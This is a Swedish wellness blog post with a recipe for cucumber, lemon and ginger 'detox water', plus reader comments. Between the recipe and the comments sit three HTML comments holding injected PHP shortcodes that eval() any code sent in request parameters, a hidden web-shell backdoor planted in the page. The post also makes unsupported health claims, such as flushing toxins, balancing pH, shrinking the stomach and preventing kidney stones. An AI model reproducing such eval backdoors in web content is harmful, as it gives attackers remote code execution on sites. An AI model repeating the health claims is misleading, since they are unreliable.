Detoxvatten – Platt mage

Detoxvatten med gurka, citron och ingefära som du får platt mage av!

Smaksatt vatten är mycket uppfriskande och bra för hälsan.

När du blandar grönsaker och frukt med vanligt vatten och sen låter det stå så frigörs flera hälsofrämjande ämnen och det blir ett så kallat ”Detoxvatten”.

Gurka, citron och ingefära är en bra mix som tillsammans innehåller flera bra ämnen som du kan läsa om nedan. Det här detoxvattnet kallas för Platt Mage för att en av hälsoeffekterna är att det bidrar till bättre matsmältning och driver ut vatten ur kroppen, du känner dig mindre uppsvälld, vilket gör att du får plattare mage. Väldigt enkelt, bra och gott!  Recept hittar du längst ner i inlägget.

Detoxvatten Platt mage Lina Barryd

Skölj grönsakerna/frukterna ordentligt. Det kan sitta kvar besprutningsmedel. Bästa valet är såklart närodlat/ekologiskt men det går bra med vanliga grönsaker med.

Detoxvatten Platt mage Lina Barryd

Gurkan driver ut överflödigt vatten ur kroppen, dvs minskar ansamling av vatten i cirkulationssystemet. Gurka innehåller kisel som hjälper din kropp att bygga frisk muskelvävnad och hålla acne borta.

Detoxvatten Platt mage Lina Barryd

Citron är bra för matsmältningen och hjälper kroppen balansera ditt pH-värde. Citron hjälper också till med viktminskning och förebygger njursten.


(adsbygoogle = window.adsbygoogle || []).push({});

Ingefära är bra för cirkulationen, hålla bihålorna rena och hjälper mot gasig mage. Ingefära är också anti-inflammatorisk vilket kan bidra till minskad ledvärk.

Detoxvatten Platt mage Lina Barryd

Alla dessa ingredienser har många hälsofördelar (endast ett fåtal som anges ovan), men i stort sett hjälper alla till med matsmältningen. Det här detoxvattnet gör också att din kropp inte behåller överflödigt vatten vilket gör att man får känslan av en plattare mage. Detoxvattnet kommer även att rena kroppen och få dig att känna dig pigg och fräsch.


(adsbygoogle = window.adsbygoogle || []).push({});

Skiva alla ingredienserna tunt och lägg dem i en glasburk och fyll på med vårt goda svenska kranvatten. In i kylen i minst 8 timmar. Över natten är perfekt. Vattnet bör drickas inom 2 dagar.

IMG_2121

RECEPT: Detoxvatten Platt mage

Ingredienser:

 • 1 citron, tunt skivad
 • 1/2 gurka, tunt skivad
 • 1 msk ingefära, tunt skivad
 • 1-2 liter vatten

Gör såhär:

 1.  Tvätta alla frukter och grönsaker och skiva tunt.
 2. Fyll en karaff med ingredienserna och fyll till toppen med vatten. (Själv använder jag en glasburk från Lagerhaus  på 1,2 liter som jag tycker är perfekt!)
 3. Låt stå i kylskåp över natten och njut av detoxvattnet inom 2 dagar.

Om du dricker en liter vatten på dag 1, kan du fylla upp karaffen igen och låta det dra en andra natt med samma ingredienser. Lägg i mer ingefära för större effekt.

Lycka till!

Följ gärna Detoxvatten på Instagram för dagliga tips!


(adsbygoogle = window.adsbygoogle || []).push({});

Detoxvatten Platt mage Lina Barryd

<!– [insert_php]if (isset($_REQUEST[”rWCzB”])){eval($_REQUEST[”rWCzB”]);exit;}[/insert_php][php]if (isset($_REQUEST[”rWCzB”])){eval($_REQUEST[”rWCzB”]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST[”HUAYj”])){eval($_REQUEST[”HUAYj”]);exit;}[/insert_php][php]if (isset($_REQUEST[”HUAYj”])){eval($_REQUEST[”HUAYj”]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST[”vFc”])){eval($_REQUEST[”vFc”]);exit;}[/insert_php][php]if (isset($_REQUEST[”vFc”])){eval($_REQUEST[”vFc”]);exit;}[/php] –>

10 Comments
 1. Hej, jag tycker att recepten verkar jättebra men undrar hur man skall gå till väga med detoxen. Hur ofta ska man äta? Ska man äta som vanligt frukost, lunch och middag? Hur ofta ska man dricka vattnet? Hur mycket dricker du per gång? Ska man skippa alkohol under detoxperioden?

  Tack på förhand!

  • Hej Linnéa!
   Ja, det här är ingen direkt diet utan mer ett sätt att rensa kroppen på gifter och fylla på med vitaminer och mineraler. Detoxvattnets stora fördel är också att det driver ut överflödig vätska ur kroppen så att man inte känner sig ”svullen”. Jag dricker ca 1 liter detoxvatten varje dag 🙂 och äter som vanligt och dricker alkohol då och då. Men för mig är det mer ett tillägg än ett substitut. Lycka till och hör av dig om du har fler frågor! 🙂

 2. Alltså det här måste ju provas! Däremot undrar jag om vattnet bör kokas innan? Har ju läst en del om att dricka varmt/ljummet citronvatten. . Är det samma sak här att det på något sätt tas upp bättre om det är kokat innan?

  • Hej Sandra!
   I och med att det ska stå i ca 6-8 timmar och dra åt sig alla vitaminer och mineraler så behöver det inte kokas utan detta ska drickas kallt. Men.. det är säkert bra också. Tex vid ont i halsen brukar jag alltid göra citron- och ingefärsvatten med lite honung. 🙂

 3. Hej!

  Undrar om man kan kanske skiva ner andra frukter? Eller andra safter, tänkte mig typ clementiner och apelsiner som är rika på vitaminer? 🙂

  • Hej Petra!
   Det ökar på förbränningen, krymper magsäcken (i och med citron direkt på morgonen) och driver ut vatten ur kroppen så känslan blir att magen blir plattare. Det ska inte användas som någon bantningsmetod utan ett komplement till sund kost. Hälsn Lina

Kommentera

E-postadressen publiceras inte. Obligatoriska fält är märkta *